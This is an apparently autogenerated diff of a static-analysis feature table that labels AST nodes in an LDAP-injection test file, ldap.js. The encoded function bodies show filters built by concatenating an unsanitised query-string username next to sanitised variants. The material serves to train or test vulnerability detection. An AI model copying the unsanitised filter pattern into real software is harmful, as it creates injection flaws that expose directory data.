url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:37:15 | client.search | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:37:15 | client.search | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:45:3 | client. ... {}\\n ) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:45:3 | client. ... {}\\n ) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:45:3 | client. ... {}\\n ) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:45:3 | client. ... {}\\n ) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:45:3 | client. ... {}\\n ) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:45:3 | exceptional return of client. ... {}\\n ) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:45:3 | exceptional return of client. ... {}\\n ) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:45:3 | exceptional return of client. ... {}\\n ) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:45:3 | exceptional return of client. ... {}\\n ) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:45:3 | exceptional return of client. ... {}\\n ) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:10:37:15 | search | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:10:37:15 | search | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:10:37:15 | search | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:10:37:15 | search | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:10:37:15 | search | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:38:5:38:15 | "o=example" | CalleeFlexibleAccessPath | client.search | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:38:5:38:15 | "o=example" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:38:5:38:15 | "o=example" | calleeImports | ldapjs | @@ -1072,6 +5718,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:39:5:43:5 | { // OK ... ,\\n } | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:39:5:43:5 | { // OK ... ,\\n } | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:39:5:43:5 | { // OK ... ,\\n } | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:7:40:12 | filter | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:7:40:12 | filter | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:7:40:12 | filter | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:7:40:12 | filter | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:7:40:12 | filter | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:7:42:11 | filter: ... )}))` | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:7:42:11 | filter: ... )}))` | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:7:42:11 | filter: ... )}))` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:7:42:11 | filter: ... )}))` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:7:42:11 | filter: ... )}))` | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:7:42:11 | filter: ... )}))` | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:7:42:11 | filter: ... )}))` | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:7:42:11 | filter: ... )}))` | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:7:42:11 | filter: ... )}))` | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:7:42:11 | filter: ... )}))` | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:15:42:11 | `(\|(nam ... )}))` | CalleeFlexibleAccessPath | client.search | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:15:42:11 | `(\|(nam ... )}))` | InputAccessPathFromCallee | 1.filter | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:15:42:11 | `(\|(nam ... )}))` | InputArgumentIndex | 1 | @@ -1082,6 +5743,71 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:15:42:11 | `(\|(nam ... )}))` | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:15:42:11 | `(\|(nam ... )}))` | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:15:42:11 | `(\|(nam ... )}))` | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:16:40:23 | (\|(name= | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:16:40:23 | (\|(name= | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:16:40:23 | (\|(name= | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:16:40:23 | (\|(name= | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:16:40:23 | (\|(name= | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:16:40:23 | (\|(name= | stringConcatenatedWith | -endpoint- sanitizeInput() + ')(username=' + sanitizeInput() + '))' | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:26:40:38 | sanitizeInput | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:26:40:38 | sanitizeInput | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:26:40:38 | sanitizeInput | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:26:40:38 | sanitizeInput | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:26:40:38 | sanitizeInput | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:26:40:48 | exceptional return of sanitiz ... ername) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:26:40:48 | exceptional return of sanitiz ... ername) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:26:40:48 | exceptional return of sanitiz ... ername) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:26:40:48 | exceptional return of sanitiz ... ername) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:26:40:48 | exceptional return of sanitiz ... ername) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:26:40:48 | sanitiz ... ername) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:26:40:48 | sanitiz ... ername) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:26:40:48 | sanitiz ... ername) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:26:40:48 | sanitiz ... ername) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:26:40:48 | sanitiz ... ername) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:26:40:48 | sanitiz ... ername) | stringConcatenatedWith | '(\|(name=' -endpoint- ')(username=' + sanitizeInput() + '))' | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:50:40:60 | )(username= | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:50:40:60 | )(username= | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:50:40:60 | )(username= | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:50:40:60 | )(username= | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:50:40:60 | )(username= | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:50:40:60 | )(username= | stringConcatenatedWith | '(\|(name=' + sanitizeInput() -endpoint- sanitizeInput() + '))' | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:63:40:75 | sanitizeInput | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:63:40:75 | sanitizeInput | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:63:40:75 | sanitizeInput | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:63:40:75 | sanitizeInput | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:63:40:75 | sanitizeInput | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:63:42:7 | exceptional return of sanitiz ... ) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:63:42:7 | exceptional return of sanitiz ... ) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:63:42:7 | exceptional return of sanitiz ... ) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:63:42:7 | exceptional return of sanitiz ... ) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:63:42:7 | exceptional return of sanitiz ... ) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:63:42:7 | sanitiz ... ) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:63:42:7 | sanitiz ... ) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:63:42:7 | sanitiz ... ) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:63:42:7 | sanitiz ... ) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:63:42:7 | sanitiz ... ) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:40:63:42:7 | sanitiz ... ) | stringConcatenatedWith | '(\|(name=' + sanitizeInput() + ')(username=' -endpoint- '))' | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:42:9:42:10 | )) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:42:9:42:10 | )) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:42:9:42:10 | )) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:42:9:42:10 | )) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:42:9:42:10 | )) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:42:9:42:10 | )) | stringConcatenatedWith | '(\|(name=' + sanitizeInput() + ')(username=' + sanitizeInput() -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:4 | this | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:4 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:4 | this | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:4 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:4 | this | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | 'arguments' object of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | 'arguments' object of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | 'arguments' object of anonymous function | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | exceptional return of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | exceptional return of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | exceptional return of anonymous function | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | functio ... res) {} | CalleeFlexibleAccessPath | client.search | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | functio ... res) {} | InputArgumentIndex | 2 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | functio ... res) {} | calleeImports | ldapjs | @@ -1091,6 +5817,257 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | functio ... res) {} | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | functio ... res) {} | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | functio ... res) {} | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | return of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | return of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:5:44:26 | return of anonymous function | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:15:44:17 | err | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:15:44:17 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:15:44:17 | err | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:15:44:17 | err | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:15:44:17 | err | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:20:44:22 | res | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:20:44:22 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:20:44:22 | res | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:20:44:22 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:44:20:44:22 | res | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:7:48:7 | f | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:7:48:7 | f | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:7:48:7 | f | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:7:48:7 | f | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:7:48:7 | f | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:7:59:4 | f | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:7:59:4 | f | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:7:59:4 | f | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:7:59:4 | f | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:7:59:4 | f | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:7:59:4 | f = new ... ],\\n }) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:7:59:4 | f = new ... ],\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:7:59:4 | f = new ... ],\\n }) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap 